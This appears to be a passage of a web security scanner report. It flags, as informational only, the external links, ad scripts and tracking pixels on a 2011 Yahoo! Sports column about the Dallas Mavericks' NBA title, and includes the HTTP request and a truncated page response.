<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kWFuhCAQhU-kooC46WEMi3RlVxjDQDfu6QvYJtq0_QV5883jMXPHZoum6WpRk3xbQE7aVxPYSn9oF2rfMtp17dv9CCpwTqtgwFXWuN8Z6YyV_yN3_L1Ka7qn-SpyMVCei6ilV_MoEQ2GJhXNfh07Qi5k6Ejb0-HoloJikC5gEnuWmOKygi8K43wovtf4eh3bgrzi2QYeRmdFDJxlZQarRwtTXHQmOaFDXzqNemh_7H0aN8HzqKACr8N8_reVTt7OnUp6iKiXoxaX00omg2oBjD6H61vByB7XWnDNhmuVIpZTzVo9yos9p-zyB2X0pVqNq4KXmb4lXJA0pIx7uZopf7UTrAztfdkg5jSCMloc10Vu2o_7ln6kHq8QAthv9RPVHctE.js?z&m"></script>
...[SNIP]...
<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/205/yunivhead-min.css&kx/ucs/uh/css/194/logo-min.css&kx/ucs/search/css/163/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
<li><a href="http://footballrecruiting.rivals.com/" class="rivals">NCAA Football Recruiting</a>
...[SNIP]...
<li><a href="http://www.rivals.com" class="rivals">Rivals.com Home</a>
...[SNIP]...
<li><a href="http://basketballrecruiting.rivals.com" class="rivals">NCAA Basketball Recruiting</a>
...[SNIP]...
<li><a href="http://www.rivals.com" class="rivals">Rivals.com Home</a>
...[SNIP]...
<li id="actionsports" class="more grind-tv"><a href="http://www.grindtv.com">Action Sports</a>
...[SNIP]...
<li><a class="grind-tv" href="http://www.grindtv.com/">GrindTV Home</a>
...[SNIP]...
<li><a class="grind-tv" href="http://www.grindtv.com/skate/">Skate</a>
...[SNIP]...
<li><a class="grind-tv" href="http://www.grindtv.com/surf/">Surf</a>
...[SNIP]...
<li><a class="grind-tv" href="http://www.grindtv.com/snow/">Snow</a>
...[SNIP]...
<li><a class="grind-tv" href="http://www.grindtv.com/wake/">Wake</a>
...[SNIP]...
<li><a class="grind-tv" href="http://www.grindtv.com/bike/">BMX</a>
...[SNIP]...
<li><a class="grind-tv" href="http://www.grindtv.com/moto/">Motocross</a>
...[SNIP]...
<li><a href="http://rivals.com/">Rivals.com</a>
...[SNIP]...
<li id="thepostgame" class="first postGame"><a href="http://thepostgame.com">The Post Game</a>
...[SNIP]...
<li id="leagueshop" class="shop"><a href="http://yahoosports.teamfanshop.com">Shop</a>
...[SNIP]...
<li id="Tickets" class="external"><a href="http://seatgeek.com/nba-tickets/?aid=14">Tickets</a>
...[SNIP]...
<div id="ad-362051" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307964051305165&transactionID=1307964051305165"></script>
...[SNIP]...
<td valign="top" width="70"><img src="http://l.yimg.com/a/i/us/sp/cn/headshots/adrian_wojnarowski.jpg" width="70" height="70" alt="Adrian Wojnarowski" title="Adrian Wojnarowski"><br><img src="http://l.yimg.com/a/i/us/sp/p/yse_lo_70x24_2.gif" width="70" height="24" alt="Yahoo! Sports" title="Yahoo! Sports"></td>
...[SNIP]...
<p>
<a href="http://twitter.com/WojYahooNBA" target="new">Follow him on Twitter</a>
...[SNIP]...
<a href="http://add.my.yahoo.com/rss?url=http://sports.yahoo.com/top/expertsarchive/rss.xml?author=Adrian+Wojnarowski"><img src="http://l.yimg.com/a/i/us/my/addtomyyahoo4.gif" alt="Add to My Yahoo!" width="91" height="17" border="0"></a>
<a href="/top/expertsarchive/rss.xml?author=Adrian+Wojnarowski"><img src="http://l.yimg.com/a/i/us/ext/rss4.gif" alt="RSS" width="17" height="17" border="0"></a>
...[SNIP]...
<div id="ad-862421" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307964051305165&transactionID=1307964051305165"> </script>
...[SNIP]...
<li><a href="http://www.citizensports.com/" target="sports">Citizen Sports</a>
...[SNIP]...
<li><a class="shop" href="http://yahoosports.teamfanshop.com/">Buy Sports Merchandise</a>
...[SNIP]...

<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js"></script>
...[SNIP]...
</noscript> <img src="https://ad.yieldmanager.com/pixel?id=190534&t=2 width=1" height="1" /><script language=javascript>
...[SNIP]...
</noscript> <img width="0" height="0" border="0" src="http://ad.yieldmanager.com/pixel?adv=23351&t=2"><script language=javascript>
...[SNIP]...
</div>

<iframe src="http://data.nba.com/data/html/gdyn/gdyn_nba.html" width=1 height=2 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no style="display:block;height:0;"></iframe>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ero654(gid$bnnZ.UwNdHGaXyrxTfXxcAB6rcHW80318pMAAPjF,st$1307964051090007,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.205. http://sports.yahoo.com/nba/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sports.yahoo.com
Path:	/nba/news

Issue detail

The page was loaded from a URL containing a query string:

http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311

The response contains the following links to other domains:

http://26594.r.msn.com/?ld=4vP5TFjgd4Zn6kmJ_ClbruYWOo9p5X-ol0aNM0y9l5wD__yHi9S9gbrf9ZQzIL9l1nzg_T24mJGRsaXO12GE_MDj-agGvkbUqadKGwBvyn8EmQwYcYd3_EvGSNIjHuftQyr3NLZbSrXokFTnfK5VT66o95b52u2dFPb6tSFrKRsdFKENZpnREZgjlcHd38WvPsdhQ8vMqCvuI3hPu4CnC8iOYlqcSPdtvP_0C7RD_rzSYZXUZfRuHLHG7ZK9NogKAB9lbagkCSy7alHAfn5xjjBiIEpoDfWyG5a9-kamZ9pE01VAlMCb_KRReWUlwvkkK5zCi0KBAmY3M9DlS_nLHGgESR_KCIqfARqHfBG6mwMLMHxJCgzL-MZfo
http://392327.r.msn.com/?ld=4vMHH-I3o3m4sgA-S3HTQp0wmqiw5lf0V4nldf_YGHkY5DakwqWz9zNtigoVwOUsUMGk0Izv7RHQmEVYGiAZprUflwOG8YAS_58pymOm9_XZxUBHdexKEgwq1w4uSYXvTlacQrKmDuKQ4FQPvsZbDqra_oTVpAgBSAzNmqgdinbkZ_yLTgDN15teC57hs0HPXHG0Tbfm5g4djPQvMJBB7PaBnL4nz8EXiXno2MXjACLROuZsu8Gg0B1rhwXe1AA9W3KcHYLa-2HmsXjKYke0GG6zVUCUw2hkOtlS9_0AqMel0x_AE8ECZjcz0Wf8B_djtcamKEaPLL-bq5gVnBoo44-0Nadz0LQgUquw
http://948702.r.msn.com/?ld=4vW3P72OnpowZPtj59RI6QLpqs-uCCNNjbk6ULiGUQS-VvilqU70AHJx5c6s7tKs4D-aYAnDsOiGprSGS6I41ziHIHb7khDLUExec9m2mZE0S0w-XhUAePmg1YH0nMVH-1pJFHekqnMlqNaqjEo79e4Uxj217CXlGL6wVR2ixlKwR4J8FB89xm4Xu2aTO1owuyM-8lmwpET9BoAe5iiH_4QIMU6sE2AVsKlqcaeHTjQSc1VAlMN2xzYxacYL9wWfjtNq9aYhAmY3M96xZhqeQGR_CkdvT8wUh1_YvKhS1VlhdTBgujITBLnhc
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541
http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541
http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541
http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541
http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg
http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js
http://bit.ly/lhnZPc
http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128c4n592(gid$b8WRZUwNdHHm3NorTdAdCwBDrcHW80317sIABdTj,st$1307963074476285,v$1.0))&t=J-D
http://d.yimg.com/a/p/sp/ap/5e/fullj.261e7f944cfd25545b56930f1a2c06f3/ap-201106081242457246066.jpg?x=94&y=63&xc=1&yc=1&wc=349&hc=233&q=100&sig=DQRWzZOA498_5jeJ8SOypQ--
http://d.yimg.com/a/p/sp/ap/99/fullj.8f741bf99581b1f598f4bbd0ccac4f13/ap-201105301352499683518.jpg?x=198&y=136&xc=44&yc=1&wc=353&hc=243&q=100&sig=E7mAhtCIVwOCNe2DzFMJTA--
http://d.yimg.com/a/p/sp/getty/74/fullj.be3dd8e493d12661a6c3c69da6bd27b7/be3dd8e493d12661a6c3c69da6bd27b7-getty-_dolphin.jpg?x=94&y=63&xc=1&yc=1&wc=660&hc=442&q=100&sig=SLg3JcDSSPtWv01t0JhaVw--
http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=198&y=136&xc=11&yc=1&wc=640&hc=440&q=100&sig=4Wg8UWZyVI3MM3XRtxqJOA--
http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=94&y=63&xc=3&yc=1&wc=656&hc=440&q=100&sig=attJqgVCcbWX5fJecGk9.A--
http://d.yimg.com/nl/yahoo%20sports/site/player.swf
http://data.nba.com/data/html/gdyn/gdyn_nba.html
http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307963074
http://l.yimg.com/a/i/us/sp/ed/experts/wojnarowski.png
http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png
http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png
http://l.yimg.com/a/i/ww/news/2011/06/08/goalie.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=TlV8qtCIHSkJYCX8s7qSeg--
http://l.yimg.com/a/i/ww/news/2011/06/10/brady.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=6Px4mV9VHyfgCJ68lZsJXA--
http://l.yimg.com/a/i/ww/news/2011/06/10/d2.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=kZLWzEBuB5OIti.wD3qccQ--
http://l.yimg.com/a/i/ww/news/2011/06/10/goal.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=ljrQeiwcSj_mrmcVg4ATtg--
http://l.yimg.com/a/i/ww/news/2011/06/10/lebron-big.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=uIeKaizVW.RdorgryBe0Sg--
http://l.yimg.com/a/i/ww/news/2011/06/10/mavs.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=u5SPXj_CUd8f7TwwUIjXZQ--
http://l.yimg.com/a/i/ww/news/2011/06/10/tiger1.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=dIURv6ZGoyUZZmWzhyuzVg--
http://l.yimg.com/a/i/ww/news/2011/06/11/godfrey-ipad.jpg?x=94&y=63&xc=215&yc=1&wc=596&hc=400&q=100&sig=KiIps_4zc5vJdVb5T8ZL8g--
http://l.yimg.com/a/p/i/bcst/cbslocal/18565/124828263.jpg
http://l.yimg.com/a/p/i/bcst/turnersports/18542/124827592.jpg
http://l.yimg.com/a/p/i/bcst/turnersports/18542/124828121.jpg
http://l.yimg.com/a/p/sp/editorial_image/66/66ed4c090d435ded86878f05b9320df7/nbalal.jpg
http://l.yimg.com/a/p/sp/editorial_image/af/afb7a05bacb4dc1f3b0ee9ea39f1efc2/nbadal.gif
http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/05/ipt/1306711597.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307677853.jpg?x=94&y=63&xc=13&yc=1&wc=350&hc=235&q=100&sig=_7Ph44gxlCqLT7uQYXoBQg--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307722364.gif?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=WMd9OccAwMTzQnWUVZpv5g--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307852871.jpg?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=pSs3IwCg5jz8cCv94n_7Qw--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307855496.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=fBEIDS2ocjb7Na3dci2q1w--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307858429.jpg?x=94&y=63&xc=1&yc=1&wc=200&hc=134&q=100&sig=XyvTu0c9VsrVHGCR3997bA--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307937492.jpg?x=198&y=136&xc=1&yc=1&wc=220&hc=151&q=100&sig=TR.XYVYO4ZmKsIIgKwVMcQ--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307938675.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307947097.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=Ec2FAhGBmbcGt5yb1E1q7A--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307948894.jpg?x=94&y=63&xc=43&yc=1&wc=326&hc=219&q=100&sig=Xvl4l0f_TVE.F1uSsI4ZHw--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955445.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955591.jpg
http://l.yimg.com/j/assets/css/video/dash-players/ysp-dash-players.r172932.css?m
http://l.yimg.com/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m
http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m
http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/answers_badge_1.5.r143221;js/teamtracker.r143221.js?m
http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r170778;js/video/dash-players/dash-players-init.r172129.js?m
http://l.yimg.com/j/assets/print_css/article.r158641.css?m
http://l.yimg.com/zz/combo?kx/ucs/uh/css/205/yunivhead-min.css&kx/ucs/uh/css/194/logo-min.css&kx/ucs/search/css/163/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css
http://twitter.com/WojYahooNBA
http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307963074
http://yahoosports.teamfanshop.com/NBA_Basketball
http://yhoo.it/j7vXPD
http://yhoo.it/jSvQmx
http://yhoo.it/mAVQQC

Request

GET /nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:04:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r3.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 141002

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Perseverance pays off for Nowitzki, Mavs - NBA - Yahoo! Sports</title>
<meta http-e
...[SNIP]...
<meta name="description" content="While LeBron James wallows in failure, Dirk Nowitzki is rewarded for being the consummate blue-collar employee. - National Basketball Association news"/>
<link type="text/css" rel="stylesheet" media="screen" href="http://l.yimg.com/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m" />
<link type="text/css" rel="stylesheet" media="print" href="http://l.yimg.com/j/assets/print_css/article.r158641.css?m" />

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m"></script>
...[SNIP]...
<meta property="og:title" content="Perseverance pays off for Nowitzki, Mavs" />
<link rel="image_src" href="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955445.jpg" />
<link rel="canonical" href="http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311" />
...[SNIP]...
<meta name="msapplication-task" content="name=Photos;action-uri=http://sports.yahoo.com/nba/gallery;icon-uri=http://sports.yahoo.com/favicon.ico" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/css/video/dash-players/ysp-dash-players.r172932.css?m" />

<STYLE>
...[SNIP]...
<h2 id="yahoo-image-logo"><img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png" alt="Yahoo! Sports" /></h2>
...[SNIP]...
<div id="ysp-hd">

<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/205/yunivhead-min.css&kx/ucs/uh/css/194/logo-min.css&kx/ucs/search/css/163/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
<div id="ad-362051" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541"></script>
...[SNIP]...
<div class="hd">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/05/ipt/1306711597.jpg" />

<h1 property="dc:title">
...[SNIP]...
<div class="byline">
<img src="http://l.yimg.com/a/i/us/sp/ed/experts/wojnarowski.png" alt="Adrian Wojnarowski" />
<div rel="dc:creator">
...[SNIP]...
<param name="flashVars" value="vid=25587086"><embed width="576" height="324" allowfullscreen="true" src="http://d.yimg.com/nl/yahoo%20sports/site/player.swf" type="application/x-shockwave-flash" flashvars="vid=25587086"></object>
...[SNIP]...
<li class="B"><a href="http://yhoo.it/mAVQQC" >Wetzel: LeBron's failure warms Cleveland's heart</a>
...[SNIP]...
<li class="B"><a href="http://yahoosports.teamfanshop.com/NBA_Basketball" target="_new">Buy championship gear</a>
...[SNIP]...
<div id="ad-862421" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541"> </script>
...[SNIP]...
<div class="inline_photo inline_photo_right" style="width: 180px">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955445.jpg"/> <div class="caption">
...[SNIP]...
<div class="inline_photo inline_photo_right" style="width: 325px">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955591.jpg"/> <div class="caption">
...[SNIP]...
<br />
• <a href="http://yhoo.it/j7vXPD">Twins’ Francisco Liriano loses no-no after long wait</a><br />
• <a href="http://yhoo.it/jSvQmx">Jeff Gordon notches historic win at Pocono</a>
...[SNIP]...
<br />
• <a href="http://bit.ly/lhnZPc">Pete Carroll scolds NCAA for penalizing current USC players</a>
...[SNIP]...
<div class="author">Adrian Wojnarowski is the NBA columnist for Yahoo! Sports. <a href="http://twitter.com/WojYahooNBA" target="new">Follow him on Twitter</a>
...[SNIP]...

<a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307963074" class="digg" title="Digg.com" target="_new">digg</a>
...[SNIP]...

<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307963074" class="facebook" title="Facebook" target="_new">add to facebook</a>
...[SNIP]...

<a href="http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311" class="twitter" title="Twitter" target="_new">Twitter</a>
...[SNIP]...
<div class="super-thumb">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307937492.jpg?x=198&y=136&xc=1&yc=1&wc=220&hc=151&q=100&sig=TR.XYVYO4ZmKsIIgKwVMcQ--" title="Mavericks win first NBA title, oust Heat" alt="Mavericks win first NBA title, oust Heat" class="thumb-img" width="198" height="136">
<span class="text-bars">
...[SNIP]...
<div class="super-thumb">
<img src="http://d.yimg.com/a/p/sp/ap/99/fullj.8f741bf99581b1f598f4bbd0ccac4f13/ap-201105301352499683518.jpg?x=198&y=136&xc=44&yc=1&wc=353&hc=243&q=100&sig=E7mAhtCIVwOCNe2DzFMJTA--" title="1 win from title, Mavs not excited yet" alt="1 win from title, Mavs not excited yet" class="thumb-img" width="198" height="136">
<span class="text-bars">
...[SNIP]...
<div class="super-thumb">
<img src="http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=198&y=136&xc=11&yc=1&wc=640&hc=440&q=100&sig=4Wg8UWZyVI3MM3XRtxqJOA--" title="Still no crown for LeBron" alt="Still no crown for LeBron" class="thumb-img" width="198" height="136">
<span class="text-bars">
...[SNIP]...
74/L=b8WRZUwNdHHm3NorTdAdCwBDrcHW80317sIABdTj/B=TsBvHmKImgw-/J=1307963074600541/K=.OoIJwU._xX8oU5xdM7ZPA/A=6418146/R=0/SIG=11j13n4o5/*http://football.fantasysports.yahoo.com/f1/signup" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg" alt="click here" width="630" height="31" border="0"></a>
...[SNIP]...
<h4><a href="http://26594.r.msn.com/?ld=4vP5TFjgd4Zn6kmJ_ClbruYWOo9p5X-ol0aNM0y9l5wD__yHi9S9gbrf9ZQzIL9l1nzg_T24mJGRsaXO12GE_MDj-agGvkbUqadKGwBvyn8EmQwYcYd3_EvGSNIjHuftQyr3NLZbSrXokFTnfK5VT66o95b52u2dFPb6tSFrKRsdFKENZpnREZgjlcHd38WvPsdhQ8vMqCvuI3hPu4CnC8iOYlqcSPdtvP_0C7RD_rzSYZXUZfRuHLHG7ZK9NogKAB9lbagkCSy7alHAfn5xjjBiIEpoDfWyG5a9-kamZ9pE01VAlMCb_KRReWUlwvkkK5zCi0KBAmY3M9DlS_nLHGgESR_KCIqfARqHfBG6mwMLMHxJCgzL-MZfo">Oklahoma City Flowers</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://26594.r.msn.com/?ld=4vP5TFjgd4Zn6kmJ_ClbruYWOo9p5X-ol0aNM0y9l5wD__yHi9S9gbrf9ZQzIL9l1nzg_T24mJGRsaXO12GE_MDj-agGvkbUqadKGwBvyn8EmQwYcYd3_EvGSNIjHuftQyr3NLZbSrXokFTnfK5VT66o95b52u2dFPb6tSFrKRsdFKENZpnREZgjlcHd38WvPsdhQ8vMqCvuI3hPu4CnC8iOYlqcSPdtvP_0C7RD_rzSYZXUZfRuHLHG7ZK9NogKAB9lbagkCSy7alHAfn5xjjBiIEpoDfWyG5a9-kamZ9pE01VAlMCb_KRReWUlwvkkK5zCi0KBAmY3M9DlS_nLHGgESR_KCIqfARqHfBG6mwMLMHxJCgzL-MZfo">Same Day Oklahoma City Flower Delivery. Family Owned and Operated!</a></p><a 